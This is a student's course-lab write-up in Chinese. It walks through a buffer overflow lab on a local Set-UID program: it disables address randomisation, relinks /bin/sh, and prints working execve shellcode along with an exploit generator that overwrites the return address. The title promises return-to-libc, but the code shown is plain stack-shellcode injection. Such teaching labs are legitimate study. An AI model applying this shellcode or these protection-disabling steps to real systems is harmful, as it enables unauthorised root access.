2022-2023-1 20222801《Linux内核原理与分析》第十一周作业

Linux系统内核第十一周作业

---

return-to-libc实验

实验完成过程视频地址：
①关闭系统的地址空间随机化机制，即sudo sysctl -w kernel.randomize_va_space=0，并且将/bin/sh重定向到zsh的条件下进行实验：https://www.bilibili.com/video/BV1CP4y1R7Bo/?share_source=copy_web&vd_source=a5768785af2afaee71993a0613b1ea62
②开启地址空间随机化机制，并且将/bin/sh重定向到zsh的条件下进行实验：
https://www.bilibili.com/video/BV1p14y1n7cP/?share_source=copy_web&vd_source=a5768785af2afaee71993a0613b1ea62
③关闭系统的地址空间随机化机制，即sudo sysctl -w kernel.randomize_va_space=0，并将将/bin/sh 重新指向 /bin/bash
https://www.bilibili.com/video/BV1Wg411p7RT/?share_source=copy_web&vd_source=a5768785af2afaee71993a0613b1ea62

相关原理：
原理：通过一段包含shellcode以及shellcode地址的长字符串注入到程序中，以shellcode地址来覆盖程序原有的返回地址，从而让目标程序来执行我们的shellcode，以此达到攻击目的
保护措施：为了防止缓冲区溢出攻击，现在常用的保护措施有两种，一是设置堆栈不可执行，漏洞程序在执行注入到堆栈中的shellcode时就会发生程序崩溃。二是代码生成地址随机化，以此来使得攻击者无法准确得知shellcode的地址
return-to-libc攻击原理：
为了避开堆栈不可执行的问题，return-to-libc攻击放弃了让漏洞程序执行堆栈中的shellcode，而是跳转到已经存在的代码（例如libc库中的system函数）来完成攻击

实验一：关闭系统的地址空间随机化机制，即sudo sysctl -w kernel.randomize_va_space=0

（完成过程视频地址：【return-to-libc实验一】 https://www.bilibili.com/video/BV1CP4y1R7Bo/?share_source=copy_web&vd_source=a5768785af2afaee71993a0613b1ea62）

1. 首先准备32位的实验环境

sudo apt-get update
sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
sudo apt-get install -y python3.6-gdbm gdb

2. Ubuntu 和其他一些 Linux 系统中，使用地址空间随机化来随机堆（heap）和栈（stack）的初始地址，这使得猜测准确的内存地址变得十分困难，而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中，我们使用以下命令关闭这一功能。此外，为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击，许多shell程序在被调用时自动放弃它们的特权。因此，即使你能欺骗一个 Set-UID 程序调用一个 shell，也不能在这个 shell 中保持 root 权限，这个防护措施在 /bin/bash 中实现。linux 系统中，/bin/sh 实际是指向 /bin/bash 或 /bin/dash 的一个符号链接。为了重现这一防护措施被实现之前的情形，我们使用另一个 shell 程序（zsh）代替 /bin/bash。

sudo sysctl -w kernel.randomize_va_space=0

sudo su
cd /bin
rm sh
ln -s zsh sh
exit

3. 在 /tmp 目录下新建一个 stack.c 文件

/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

编译该程序，并设置 SET-UID。命令如下：

sudo su
gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack
exit

再在 /tmp 目录下新建一个 exploit.c 文件

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移处起始的四个字节覆盖sellcode地址  
    strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer，偏移量设为了 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

注意上面的代码，\x??\x??\x??\x?? 处需要添上 shellcode 保存在内存中的地址，因为发生溢出后这个位置刚好可以覆盖返回地址。而 strcpy(buffer+100,shellcode); 这一句又告诉我们，shellcode 保存在 buffer + 100 的位置。现在我们要得到 shellcode 在内存中的地址，输入命令进入 gdb 调试：

gdb stack
disass main

esp 中就是 str 的起始地址，所以在地址 0x080484ee 处设置断点

最后获得的这个 0xffffd2b0 就是 str 的地址

现在修改 exploit.c 文件，将 \x??\x??\x??\x?? 修改为计算的结果 \x14\xd0\xff\xff，注意顺序是反的

然后，编译 exploit.c 程序

先运行攻击程序 exploit，再运行漏洞程序 stack，观察结果

实验二：开启地址空间随机化机制，并且将/bin/sh重定向到zsh的条件下进行实验

（完成过程视频地址：【return-to-libc实验二】 https://www.bilibili.com/video/BV1p14y1n7cP/?share_source=copy_web&vd_source=a5768785af2afaee71993a0613b1ea62）

最后发现攻击并不成功

实验三：关闭系统的地址空间随机化机制，即sudo sysctl -w kernel.randomize_va_space=0，并将将/bin/sh 重新指向 /bin/bash

（完成过程视频地址：【return-to-libc实验三】 https://www.bilibili.com/video/BV1Wg411p7RT/?share_source=copy_web&vd_source=a5768785af2afaee71993a0613b1ea62）

最后攻击成功，但是并不是获得root权限

20222801 余酋龙

2022 年 11月 26日